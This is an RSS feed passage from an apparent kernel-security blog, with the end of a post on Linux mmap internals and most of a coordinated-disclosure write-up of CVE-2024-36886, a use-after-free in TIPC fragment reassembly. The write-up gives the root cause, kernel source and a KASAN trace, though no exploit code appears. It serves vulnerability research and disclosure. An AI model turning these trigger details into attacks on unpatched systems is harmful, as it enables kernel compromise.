	return call_int_hook(mmap_file, file, prot, mmap_prot(file, prot),
			     flags);
}</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2860">/security/security.c</a> (v6.11.5)</figcaption></figure><p>If we look for references to <code>mmap_file</code>, we can see these hooks are registered by the <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/lsm_hooks.h#L114">LSM_HOOK_INIT()</a></code> macro and that different security modules implement their own <code>mmap_file</code> hooks (e.g. capabilities, apparmor, selinux, smack). </p><p>Multiple security modules can be active on a system: the capabilities module is always active, along with any number of &quot;minor&quot; modules and up to one &quot;major&quot; module (e.g. apparmor, selinux). We can check which one&apos;s are active via <code>/sys/kernel/security/lsm</code>, the output on my VM is: </p><pre><code>$ cat /sys/kernel/security/lsm
lockdown,capability,landlock,yama,apparmor</code></pre><p>Of these, the capability and apparmor security modules both define hooks for <code>mmap_file</code>. In this case, both hooks will be run when <code>security_mmap_file()</code> is called. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/pat_down.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="260" height="236"></figure><p>I hope that was interesting, because in our example neither of these checks actually do anything. Capabilities&apos; <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/commoncap.c#L1436">cap_mmap_file()</a></code> always returns a success and apparmor&apos;s <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/apparmor/lsm.c#L582">apparmor_mmap_file()</a></code> only does checks if a <code>file</code> is specified.</p><h4 id="locking">Locking</h4><p>Before we delve another call deeper into the mm subsystem, let&apos;s quickly talk about locking. The call to <code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255">do_mmap()</a></code> is protected by the mmap write lock [2]:</p><figure class="kg-card kg-code-card"><pre><code class="language-C">unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
// SNIP
		if (mmap_write_lock_killable(mm))
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &amp;populate,
			      &amp;uf);
		mmap_write_unlock(mm);</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575">mm/util.c</a> (v6.11.5)</figcaption></figure><p>Locking is extremely important within the kernel and is used to protect shared resources by serialising access or prevent concurrent writes. Insufficient locking can lead to all sorts of undefined behaviour and security issues. </p><p><code><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mmap_lock.h#L117">mmap_write_lock_killable()</a></code> provides a wrapper for the <code>mm-&gt;mmap_lock</code>, which is a R/W semaphore. In laymans term, multiple &quot;readers&quot; can take this lock (i.e. if the calling code is just planning to read the protected resource) or a single writer can <sup>[7]</sup>. </p><p>So what does the mmap lock actually protect? That&apos;s a great question and I&apos;m not sure there&apos;s a definitive, detailed &quot;specification&quot; or anything for this (?). More generally though, it protects access to a processes address space. We&apos;ll understand more about what that entails as we delve deeper, but think add/changing/removing mappings as well as other fields within the <code>mm</code> structure too <sup>[8]</sup>.</p><p>For the curious, the <code>_killable</code> suffix indicates that the process can be killed while waiting for the lock<sup>[9][10]</sup>. In which case the function returns an error, which is caught here.</p><hr><ol><li><a href="https://man7.org/linux/man-pages/man2/mmap.2.html">https://man7.org/linux/man-pages/man2/mmap.2.html</a></li><li>If you&apos;re testing this at home, be mindful that other places will call <code>do_mmap()</code>, particularly when running a program</li><li><a href="https://docs.kernel.org/admin-guide/mm/hugetlbpage.html">https://docs.kernel.org/admin-guide/mm/hugetlbpage.html</a></li><li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053">https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/security.h#L1053</a></li><li><a href="https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849">https://elixir.bootlin.com/linux/v6.11.5/source/security/security.c#L2849</a></li><li><a href="https://docs.kernel.org/admin-guide/LSM/index.html">https://docs.kernel.org/admin-guide/LSM/index.html</a></li><li>Checkout Linux Inside&apos;s deep dive into semaphores <a href="https://0xax.gitbooks.io/linux-insides/content/SyncPrim/linux-sync-3.html">here</a>.</li><li>LWN has a good article, <a href="https://lwn.net/Articles/893906/">&quot;The ongoing search for mmap_lock scalability&quot;</a> (2022), on the importance of the <code>mmap_lock</code> and attempts to scale it</li><li>The <code>_killable</code> variant for rw semaphores was actually added in 2016, you can checkout the <a href="https://lwn.net/Articles/677962/">initial patch series</a> for details</li><li><a href="https://medium.com/geekculture/the-linux-kernel-locking-api-and-shared-objects-1169c2ae88ff">&quot;The Linux Kernel Locking API and Shared Objects&quot;</a> (2021) by Pakt is a nice resource on locking if you want to dive into the topic a bit more</li></ol><h2 id="next-time">Next Time</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/12/tired_baby.gif" class="kg-image" alt="Linternals: Exploring The mm Subsystem via mmap [0x01]" loading="lazy" width="356" height="200"></figure><p>Hopefully this isn&apos;t too much of a cliff hanger, but this post has been in my drafts for far too long now and I fear if I don&apos;t post it soon it&apos;ll never get finished &#x1F480;.</p><p>I went for a bit of a different approach with this topic, due to the scope of the mm subsystem. The aim was to use a simple case study to provide some structure and context to an otherwise complex topic. I also wanted to present an approach and workflow that could perhaps be transferable to researching other parts of the kernel, if that makes sense?</p><p>If folks are interested in a part 2, we&apos;ll continue to delve deeper into the mm subsystem, carrying on where we left off with <code>do_mmap()</code>. We&apos;ve barely scratched the surface so far! I&apos;d love to go into more detail on how mappings are represented and managed within the kernel and then move onto paging and who knows what other topics we stumble into.</p><p>As always feel free to @me (on <a href="https://twitter.com/sam4k1">X</a>, <a href="https://bsky.app/profile/sam4k.com">Bluesky</a> or less commonly used <a href="https://infosec.exchange/@sam4k">Mastodon</a>) if you have any questions, suggestions or corrections :)</p><h3></h3>]]></content:encoded></item><item><title><![CDATA[ZDI-24-821: A Remote UAF in The Kernel's net/tipc]]></title><description><![CDATA[In this post I discuss a vulnerability which  allows a local, or remote attacker, to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel. ]]></description><link>https://sam4k.com/zdi-24-821-a-remote-use-after-free-in-the-kernels-net-tipc/</link><guid isPermaLink="false">6670c154de619fc1154ef4d4</guid><category><![CDATA[VRED]]></category><category><![CDATA[linux]]></category><category><![CDATA[research]]></category><dc:creator><![CDATA[sam4k]]></dc:creator><pubDate>Wed, 03 Jul 2024 13:59:40 GMT</pubDate><media:content url="https://sam4k.com/content/images/2024/06/computer_wizard.gif" medium="image"/><content:encoded><![CDATA[<img src="https://sam4k.com/content/images/2024/06/computer_wizard.gif" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc"><p>While preparing for my talk at TyphoonCon, <a href="https://github.com/sam4k/talk-slides/blob/main/so_you_wanna_find_bugs_in_the_linux_kernel.pdf">about how to find bugs in the Linux kernel</a>, I discovered a neat little vulnerability in the kernel&apos;s TIPC networking stack.</p><p>I found this while playing around with syzkaller as part of the research for my talk; I felt like it would only be fair to find some bugs to share if I&apos;m doing a talk about it :)</p><p>I picked the TIPC protocol for a few reasons: it had low coverage, net surface is fun, it&apos;s not enabled by default (not out here trying to find critical RCEs for a slide example) plus I have some previous experience working with the protocol.</p><p>In this post I&apos;m mainly going to be talking about the vulnerability itself, remediation and maybe I&apos;ll go a little bit into exploitation cos I can&apos;t help myself. If I can find the time, I&apos;d love to do a future post talking more about the discovery process and exploitation.</p><h2 id="contents">Contents</h2><!--kg-card-begin: markdown--><ul>
<li><a href="#overview">Overview</a>
<ul>
<li><a href="#timeline">Timeline</a></li>
</ul>
</li>
<li><a href="#background-stuff">Background Stuff</a>
<ul>
<li><a href="#net-basics">net/ Basics</a>
<ul>
<li><a href="#struct-skbuff">struct sk_buff</a></li>
<li><a href="#struct-skbsharedinfo">struct skb_shared_info</a></li>
</ul>
</li>
<li><a href="#tipc-primer">TIPC Primer</a></li>
</ul>
</li>
<li><a href="#the-vulnerability">The Vulnerability</a>
<ul>
<li><a href="#exploring-the-call-trace">Exploring The Call Trace</a></li>
<li><a href="#examining-tipcbufappend">Examining tipc_buf_append()</a></li>
<li><a href="#variations">Variations</a></li>
</ul>
</li>
<li><a href="#exploitation">Exploitation</a></li>
<li><a href="#fix-remediation">Fix + Remediation</a></li>
<li><a href="#wrapup">Wrapup</a></li>
</ul>
<!--kg-card-end: markdown--><h2 id="overview">Overview </h2><p>The vulnerability allows a local, or remote attacker, to trigger a use-after-free in the TIPC networking stack on affected installations of the Linux kernel. </p><p>Only systems with the TIPC module built (<code>CONFIG_TIPC=y</code>/<code>CONFIG_TIPC=m</code>) and loaded are vulnerable. Additionally, in order to be vulnerable to a remote attack the system must have TIPC configured on an interface reachable by an attacker.</p><p>The flaw exists in the implementation of TIPC message fragment reassembly, specifically <code>tipc_buf_append()</code>. The function carries out the reassembly by chaining the fragmented packet buffers together. It takes the first fragment as the head buffer and then processes subsequent fragments sequentially, adding their packet buffers onto the head buffer&apos;s chain.</p><p>The vulnerability occurs due to a missing check in the error handling cleanup. On error, the reassembly will bail, freeing both the head buffer (and its chained buffers) and the latest fragment buffer currently being processed. If the latest fragment buffer has already been added to the head buffer&apos;s chain at this point, it will lead to a use-after-free. </p><p>The vulnerability was introduced in commit <a href="https://github.com/torvalds/linux/commit/1149557d64c97dc9adf3103347a1c0e8c06d3b89">1149557d64c9</a> (Mar 2015) and fixed in commit <a href="https://github.com/torvalds/linux/commit/080cbb890286cd794f1ee788bbc5463e2deb7c2b">080cbb890286</a> (May 2024), affecting kernel versions 4 through to 6.8. </p><p>It was assigned <a href="https://www.zerodayinitiative.com/advisories/ZDI-24-821/">ZDI-24-821</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-36886">CVE-2024-36886</a> (shoutout to the insane description formatting on that one).</p><h3 id="timeline">Timeline</h3><ul><li>2024-03-23: Case opened with ZDI</li><li>2024-04-25: Case reviewed by ZDI</li><li>2024-04-25: Case disclosed to the vendor </li><li>2024-05-02: Fix published by the vendor</li><li>2024-06-20: Coordinated public release of ZDI advisory</li></ul><h2 id="background-stuff">Background Stuff</h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/pepe_silvia.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="480" height="304"></figure><p>Before we dive into the juicy details, I&apos;m going to cover some background information to provide some additional context to the vulnerability. Feel free to skip this if you&apos;re already familiar with the networking subsystem and TIPC basics! </p><h3 id="net-basics"><code>net/</code> Basics</h3><p>So to kick things off lets try and give a bit of background on some of the networking subsystem fundamentals, as this is where the TIPC protocol is implemented! </p><p>I say try, because this subsystem is pretty complex and there&apos;s a lot of ground to cover. But in short, the networking subsystem does what it says on the tin: provides networking capability to the kernel. And it does it in way which is modular and extensible, providing a core API to implement various networking devices, protocols and interfaces.</p><h4 id="struct-skbuff"><code>struct sk_buff</code></h4><p>One of the fundamental structures that the kernel provides is <code><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L842">struct sk_buff</a></code> which represents a network packet and its status. The structure is created when a kernel packet is received, either from the user space or from the network interface.<sup><a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">[3]</a></sup></p><p>The kernel documentation honestly does a great job unpacking this rather complicated structure, so I&apos;d recommend <a href="https://docs.kernel.org/networking/skbuff.html">checking that out</a> (up to the checksum section at least).</p><p>Essentially, <code>struct sk_buff</code> itself stores various metadata and the actual packet data is stored in associated buffers. A large part of the complexity surrounding the structure is how these buffers, and the relevant pointers to them, are accessed and manipulated.</p><h4 id="struct-skbsharedinfo"><code>struct skb_shared_info</code> </h4><p>One of the features baked into this core API is packet fragmentation, the idea that a protocol&apos;s data may be split across several packets - so we have a situation where some data is fragmented across the data buffers of several <code>struct sk_buff</code>s.</p><p>This is where <code><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572">struct skb_shared_info</a></code> comes in! </p><figure class="kg-card kg-code-card"><pre><code>/* This data is invariant across clones and lives at
 * the end of the header data, ie. at skb-&gt;end.
 */
struct skb_shared_info {
	__u8		flags;
	__u8		meta_len;
	__u8		nr_frags;
	__u8		tx_flags;
	unsigned short	gso_size;
	/* Warning: this field is not always filled in (UFO)! */
	unsigned short	gso_segs;
	struct sk_buff	*frag_list;
	struct skb_shared_hwtstamps hwtstamps;
	unsigned int	gso_type;
	u32		tskey;

	/*
	 * Warning : all fields before dataref are cleared in __alloc_skb()
	 */
	atomic_t	dataref;
	unsigned int	xdp_frags_size;

	/* Intermediate layers must ensure that destructor_arg
	 * remains valid until skb destructor */
	void *		destructor_arg;

	/* must be last field, see pskb_expand_head() */
	skb_frag_t	frags[MAX_SKB_FRAGS];
};</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/include/linux/skbuff.h#L572">include/linux/skbuff.h</a> (6.7.4)</figcaption></figure><p>Among other things, this allows a packet to keep track of its fragments! Relevant to us is <code>frag_list</code>, used to link <code>struct sk_buff</code> headers together for reassembly. </p><h3 id="tipc-primer">TIPC Primer</h3><p>Transparent Inter Process Communication (TIPC) is an IPC mechanism designed for intra-cluster communication, originating from Ericsson where it has been used in carrier grade cluster applications for many years. Cluster topology is managed around the concept of nodes and the links between these nodes.</p><p>TIPC communications are done over a &quot;bearer&quot;, which is a TIPC abstraction of a network interface. A &quot;media&quot; is a bearer type, of which there are four currently supported: Ethernet, Infiniband, UDP/IPv4 and UDP/IPv6.</p><p>A local attacker is able to set up a UDP bearer as an unprivileged user via netlink, as demonstrated by bl@sty during his work on CVE-2021-43267<sup><a href="https://haxx.in/posts/pwning-tipc/">[1]</a></sup>. However, a remote attacker is restricted by whatever bearers are already set up on a system.</p><p>TIPC messages have their own header, of which there are several formats outlined in the specification<sup><a href="http://tipc.io/protocol.html">[2]</a></sup>. A common theme is the concept of message &quot;user&quot; which defines their purpose (see &quot;Figure 4: TIPC Message Types&quot;<sup><a href="http://tipc.io/protocol.html">[2]</a></sup>) and can be used to infer the format of the TIPC message.</p><p>There is a handshake to establish a link between nodes (see &quot;Link Creation&quot;<sup><a href="http://tipc.io/protocol.html">[2]</a></sup>). An established link is required to reach the vulnerable code. This essentially involves sending three messages to: advertise the node, reset the state and then set the state.</p><hr><ol><li><a href="https://haxx.in/posts/pwning-tipc/">Exploiting CVE-2021-43267</a></li><li><a href="http://tipc.io/protocol.html">TIPC Protocol Documentation</a></li><li><a href="https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking">https://linux-kernel-labs.github.io/refs/heads/master/labs/networking.html#linux-networking</a></li><li><a href="https://docs.kernel.org/networking/skbuff.html">https://docs.kernel.org/networking/skbuff.html</a></li></ol><h2 id="the-vulnerability">The Vulnerability </h2><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/here_we_go.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="480" height="270"></figure><div class="kg-card kg-callout-card kg-callout-card-grey"><div class="kg-callout-emoji">&#x1F913;</div><div class="kg-callout-text">For this example I&apos;m going to be using assuming a local attacker interacting with message fragmentation over a UDP bearer, after establishing a link, on a 6.7.4 kernel.</div></div><p>The TIPC protocol features message fragmentation, where a single TIPC message can be split into fragments and sent to its destination via several packets: &#xA0;</p><blockquote>When a message is longer than the identified MTU of the link it will use, it is split up in fragments, each being sent in separate packets to the destination node. Each fragment is wrapped into a packet headed by an TIPC internal header [...] The User field of the header is set to MSG_FRAGMENTER, and each fragment is assigned a Fragment Number relative to the first fragment of the message. Each fragmented message is also assigned a Fragmented Message Number, to be present in all fragments. [...] At reception the fragments are reassembled so that the original message is recreated, and then delivered upwards to the destination port. <sup>[1]</sup></blockquote><p>So essentially, each fragment is wrapped up in a TIPC fragment message (a message with the <code>MSG_FRAGMENTER</code> user). Each of these fragment messages will provide metadata in its header, such as the fragment number, so that the fragment within can be reassembled in the right order on the receiving end. </p><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/07/frags_example-4.png" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="707" height="317" srcset="https://sam4k.com/content/images/size/w600/2024/07/frags_example-4.png 600w, https://sam4k.com/content/images/2024/07/frags_example-4.png 707w"></figure><h4 id="exploring-the-call-trace">Exploring The Call Trace</h4><p>Let&apos;s take a look at the kernel call trace for a <code>MSG_FRAGMENTER</code> message being received by a TIPC UDP bearer. This gives us a bit of context about how the TIPC networking stack handles incoming packets:</p><pre><code>#0 tipc_link_input+0x41b/0x850 net/tipc/link.c:1339
#1 tipc_link_rcv+0x77a/0x2dc0 net/tipc/link.c:1839
#2 tipc_rcv+0x519/0x3030 net/tipc/node.c:2159
#3 tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
#4 udp_queue_rcv_one_skb+0xe76/0x19b0 net/ipv4/udp.c:2113
#5 udp_queue_rcv_skb+0x136/0xa60 net/ipv4/udp.c:2191
</code></pre><p>#5 &amp; #4 show the underlying UDP networking stack stuff. #3 is where TIPC first receives inbound TIPC-over-UDP messages, which does some basic bearer level checks before handing the <code>skb</code> over to #2, <code>tipc_rcv()</code>.</p><p>After bearer level checks, all inbound TIPC packets are processed by #2, <code>tipc_rcv()</code>. This involves sanity checks on TIPC header values and using a combination of message user and link state to figure out how the packet is going to be processed.</p><p>A valid <code>MSG_FRAGMENTER</code> message is received by #1, <code>tipc_link_rcv()</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">int tipc_link_rcv(struct tipc_link *l, struct sk_buff *skb,
          struct sk_buff_head *xmitq)
{
    struct sk_buff_head *defq = &amp;l-&gt;deferdq;
    struct tipc_msg *hdr = buf_msg(skb);
    u16 seqno, rcv_nxt, win_lim;
    int released = 0;
    int rc = 0;

    /* Verify and update link state */
    if (unlikely(msg_user(hdr) == LINK_PROTOCOL))
        return tipc_link_proto_rcv(l, skb, xmitq);

    /* Don&apos;t send probe at next timeout expiration */
    l-&gt;silent_intv_cnt = 0;

    do {
        hdr = buf_msg(skb);
        seqno = msg_seqno(hdr);                                                 [0]
        rcv_nxt = l-&gt;rcv_nxt;                                                   [1]
        win_lim = rcv_nxt + TIPC_MAX_LINK_WIN;

        if (unlikely(!link_is_up(l))) {
            if (l-&gt;state == LINK_ESTABLISHING)
                rc = TIPC_LINK_UP_EVT;
            kfree_skb(skb);
            break;
        }

        /* Drop if outside receive window */
        if (unlikely(less(seqno, rcv_nxt) || more(seqno, win_lim))) {           [2]
            l-&gt;stats.duplicates++;
            kfree_skb(skb);
            break;
        }
        released += tipc_link_advance_transmq(l, l, msg_ack(hdr), 0,
                              NULL, NULL, NULL, NULL);

        /* Defer delivery if sequence gap */
        if (unlikely(seqno != rcv_nxt)) {                                       [3]
            if (!__tipc_skb_queue_sorted(defq, seqno, skb))
                l-&gt;stats.duplicates++;
            rc |= tipc_link_build_nack_msg(l, xmitq);
            break;
        }

        /* Deliver packet */
        l-&gt;rcv_nxt++;
        l-&gt;stats.recv_pkts++;

        if (unlikely(msg_user(hdr) == TUNNEL_PROTOCOL))
            rc |= tipc_link_tnl_rcv(l, skb, l-&gt;inputq);
        else if (!tipc_data_input(l, skb, l-&gt;inputq))
            rc |= tipc_link_input(l, skb, l-&gt;inputq, &amp;l-&gt;reasm_buf);            [5]
        if (unlikely(++l-&gt;rcv_unacked &gt;= TIPC_MIN_LINK_WIN))
            rc |= tipc_link_build_state_msg(l, xmitq);
        if (unlikely(rc &amp; ~TIPC_LINK_SND_STATE))
            break;
    } while ((skb = __tipc_skb_dequeue(defq, l-&gt;rcv_nxt)));                     [4]

    /* Forward queues and wake up waiting users */
    if (released) {
        tipc_link_update_cwin(l, released, 0);
        tipc_link_advance_backlog(l, xmitq);
        if (unlikely(!skb_queue_empty(&amp;l-&gt;wakeupq)))
            link_prepare_wakeup(l);
    }
    return rc;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1786">net/tipc/link.c</a> (6.7.4)</figcaption></figure><p><code>tipc_link_rcv()</code> uses the sequence number, pulled from the TIPC message header [0], to determine the order in which to process the incoming <code>skb</code>s. It uses <code>struct tipc_link</code> to manage the link state, including what <code>seqno</code> it&apos;s expecting next [1].</p><p>Out of order packets are either dropped [2] or added to the defer queue, <code>defq</code>, for later [3] [4]. When the correct <code>seqno</code> is hit, it will do some checks to see how to process it. When the user is <code>MSG_FRAGMENTER</code>, the packet is passed to #0 <code>tipc_link_input()</code> [5].</p><p><code>tipc_link_input()</code>, #0, processes the packet depending on the user:</p><figure class="kg-card kg-code-card"><pre><code>static int tipc_link_input(struct tipc_link *l, struct sk_buff *skb,
               struct sk_buff_head *inputq,
               struct sk_buff **reasm_skb)

    // snip

    } else if (usr == MSG_FRAGMENTER) {
        l-&gt;stats.recv_fragments++;
        if (tipc_buf_append(reasm_skb, &amp;skb)) {
            l-&gt;stats.recv_fragmented++;
            tipc_data_input(l, skb, inputq);
        } else if (!*reasm_skb &amp;&amp; !link_is_bc_rcvlink(l)) {
            pr_warn_ratelimited(&quot;Unable to build fragment list\n&quot;);
            return tipc_link_fsm_evt(l, LINK_FAILURE_EVT);
        }
        return 0;
    } // snip
    
    kfree_skb(skb);
    return 0;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/link.c#L1319">net/tipc/link.c</a> (6.7.4)</figcaption></figure><h3 id="examining-tipcbufappend">Examining <code>tipc_buf_append()</code></h3><p>This function is the root cause of the vulnerability. <code>tipc_buf_append()</code> is used to append the buffers containing message fragments, in order to reassemble the original message:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">/* tipc_buf_append(): Append a buffer to the fragment list of another buffer
 * @*headbuf: in:  NULL for first frag, otherwise value returned from prev call
 *            out: set when successful non-complete reassembly, otherwise NULL
 * @*buf:     in:  the buffer to append. Always defined
 *            out: head buf after successful complete reassembly, otherwise NULL
 * Returns 1 when reassembly complete, otherwise 0
 */
int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
	struct sk_buff *head = *headbuf;
	struct sk_buff *frag = *buf;
	struct sk_buff *tail = NULL;
	struct tipc_msg *msg;
	u32 fragid;
	int delta;
	bool headstolen;

	if (!frag)
		goto err;

	msg = buf_msg(frag);
	fragid = msg_type(msg);                                     [0]
	frag-&gt;next = NULL;
	skb_pull(frag, msg_hdr_sz(msg));

	if (fragid == FIRST_FRAGMENT) {
		if (unlikely(head))
			goto err;
		*buf = NULL;
		if (skb_has_frag_list(frag) &amp;&amp; __skb_linearize(frag))
			goto err;
		frag = skb_unshare(frag, GFP_ATOMIC);
		if (unlikely(!frag))
			goto err;
		head = *headbuf = frag;                                 [1]
		TIPC_SKB_CB(head)-&gt;tail = NULL;
		return 0;
	}

	if (!head)
		goto err;

	if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {    [2]
		kfree_skb_partial(frag, headstolen);
	} else {                                                    [3]
		tail = TIPC_SKB_CB(head)-&gt;tail;
		if (!skb_has_frag_list(head))
			skb_shinfo(head)-&gt;frag_list = frag;
		else
			tail-&gt;next = frag;
		head-&gt;truesize += frag-&gt;truesize;
		head-&gt;data_len += frag-&gt;len;
		head-&gt;len += frag-&gt;len;
		TIPC_SKB_CB(head)-&gt;tail = frag;
	}

	if (fragid == LAST_FRAGMENT) {
		TIPC_SKB_CB(head)-&gt;validated = 0;
		if (unlikely(!tipc_msg_validate(&amp;head)))                [4]
			goto err;                                           [5]
		*buf = head;
		TIPC_SKB_CB(head)-&gt;tail = NULL;
		*headbuf = NULL;
		return 1;
	}
	*buf = NULL;
	return 0;
err:
	kfree_skb(*buf);                                            [6]
	kfree_skb(*headbuf);                                        [7]
	*buf = *headbuf = NULL;
	return 0;
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/tipc/msg.c#L124">net/tipc/msg.c</a> (6.7.4)</figcaption></figure><p>Walking through a typical case, when the first fragment is received <code>tipc_buf_append()</code> is called with <code>*headbuf == NULL</code> &amp; <code>*buf</code> pointing to the packet buffer of the first fragment. Note the fragment id (first, last or other) is stored in the TIPC header [0].</p><p>For the first fragment, some checks are done and this buffer is used to initialise <code>heabuf</code> [1] and it returns. For subsequent fragments in this sequence, <code>heabuf</code> is now initialised when <code>tipc_buf_append()</code> is called. These packets are then either coalesced into the head buffer [2] or added to its the <code>frag_list</code> [3].</p><p>Finally when the <code>LAST_FRAGMENT</code> is processed, added to the chain, the header of the initially fragmented packet is validated [4]. If you recall, the fragmented message is stored within the <code>MSG_FRAGMENTER</code> messages, so will have its own header that hasn&apos;t been validated yet.</p><p>Notably, if this fails (e.g. we intentionally scuff up the header of the fragmented message), both the buffers are dropped [5] [6]. At this point <code>buf</code> points to the last fragment and <code>headbuf</code> points to the head buffer (the first fragment). It is possible for <code>buf</code> to be in the <code>frag_list</code> of <code>headbuf</code> at this point as we&apos;ve seen.</p><p>However, <code>kfree_skb()</code> isn&apos;t a simple <code>kfree()</code> wrapper, due to the complexity of <code>struct sk_buff</code>. It involves quite a bit of cleanup, including cleaning up the fragments reference by the <code>frag_list</code> ... you can probably see where this is going!</p><p>The last fragment, <code>buf</code>, is freed [6]. Then, the head buffer is freed [7] whereby its <code>frag_list</code> is iterated for cleanup, leading to a use-after-free, as the final fragment has just been freed prior to this call [6]!</p><p>We can see this buy exploring the rest of the call trace when we trigger the bug:</p><pre><code>[   48.900496] ==================================================================
[   48.901414] BUG: KASAN: slab-use-after-free in kfree_skb_list_reason+0x549/0x5c0
[   48.902395] Read of size 8 at addr ffff88800927c900 by task syz_test/207
[   48.903256] 
[   48.903450] CPU: 1 PID: 207 Comm: syz_test Not tainted 6.7.4-gd09175322cfa-dirty #6
[   48.904221] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[   48.905046] Call Trace:
[   48.905306]  &lt;IRQ&gt;
[   48.905490]  dump_stack_lvl+0x72/0xa0
[   48.905787]  print_report+0xcc/0x620
[   48.906736]  kasan_report+0xb0/0xe0
[   48.907096]  kfree_skb_list_reason+0x549/0x5c0
[   48.909613]  skb_release_data.isra.0+0x4fd/0x850
[   48.909997]  kfree_skb_reason+0xf4/0x380
[   48.910171]  tipc_buf_append+0x3e4/0xad0
</code></pre><p>The site that triggers KASAN is when the fragmented buffer list is iterated during <code>kfree_skb_list_reason()</code>. It is passed the <code>frag_list</code> of the head buffer in <code>skb_release_data()</code> [0]:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">static void skb_release_data(struct sk_buff *skb, enum skb_drop_reason reason,
			     bool napi_safe)
{
	struct skb_shared_info *shinfo = skb_shinfo(skb);
	int i;

    // snip

free_head:
	if (shinfo-&gt;frag_list)
		kfree_skb_list_reason(shinfo-&gt;frag_list, reason);                       [0]
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L966">net/core/skbuff.c</a> (6.7.4)</figcaption></figure><p>We can then see the KASAN trigger in <code>kfree_skb_list_reason()</code> here [1]:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">void __fix_address
kfree_skb_list_reason(struct sk_buff *segs, enum skb_drop_reason reason)
{
	struct skb_free_array sa;

	sa.skb_count = 0;

	while (segs) {
		struct sk_buff *next = segs-&gt;next;                                      [1]

		if (__kfree_skb_reason(segs, reason)) {
			skb_poison_list(segs);
			kfree_skb_add_bulk(segs, &amp;sa, reason);
		}

		segs = next;
	}

	if (sa.skb_count)
		kmem_cache_free_bulk(skbuff_cache, sa.skb_count, sa.skb_array);
}
</code></pre><figcaption><a href="https://elixir.bootlin.com/linux/v6.7.4/source/net/core/skbuff.c#L1140">net/core/skbuff.c</a> (6.7.4)</figcaption></figure><h3 id="variations">Variations</h3><figure class="kg-card kg-image-card"><img src="https://sam4k.com/content/images/2024/04/there-smore.gif" class="kg-image" alt="ZDI-24-821: A Remote UAF in The Kernel&apos;s net/tipc" loading="lazy" width="480" height="267"></figure><p>There&apos;s a couple of variations to this vulnerability which are worth mentioning. First of all, the vulnerable path can also be reached in a very similar manner via <code>TUNNEL_PROTOCOL</code> messages, as seen in this call trace:</p><pre><code>kfree_skb_reason+0xf4/0x380 net/core/skbuff.c:1108
kfree_skb include/linux/skbuff.h:1234 [inline]
tipc_buf_append+0x3ce/0xb50 net/tipc/msg.c:186
tipc_link_tnl_rcv net/tipc/link.c:1398 [inline]
tipc_link_rcv+0x1a89/0x2dc0 net/tipc/link.c:1837
tipc_rcv+0x1220/0x3030 net/tipc/node.c:2173
tipc_udp_recv+0x745/0x930 net/tipc/udp_media.c:421
</code></pre><p>Additionally, some eagle eyed readers may also have noticed there&apos;s another way to trigger the use-after-free within <code>tipc_buf_append()</code>:</p><figure class="kg-card kg-code-card"><pre><code class="language-c">int tipc_buf_append(struct sk_buff **headbuf, struct sk_buff **buf)
{
    // snip

    if (skb_try_coalesce(head, frag, &amp;headstolen, &amp;delta)) {
        kfree_skb_partial(frag, headstolen);                        [0]
    } else {
        tail = TIPC_SKB_CB(head)-&gt;tail;
        if (!skb_has_frag_list(head))
            skb_shinfo(head)-&gt;frag_list = frag;
        else
            tail-&gt;next = frag;
        head-&gt;truesize += frag-&gt;truesize;
        head-&gt;data_len += frag-&gt;len;
        head-&gt;len += frag-&gt;len;
        TIPC_SKB_CB(head)-&gt;tail = frag;
    }

    if (fragid == LAST_FRAGMENT) {
        TIPC_SKB_CB(head)-&gt;validated = 0;
        if (unlikely(!tipc_msg_validate(&amp;head)))
            goto err;
        *buf = head;
        TIPC_SKB_CB(head)-&gt;tail = NULL;
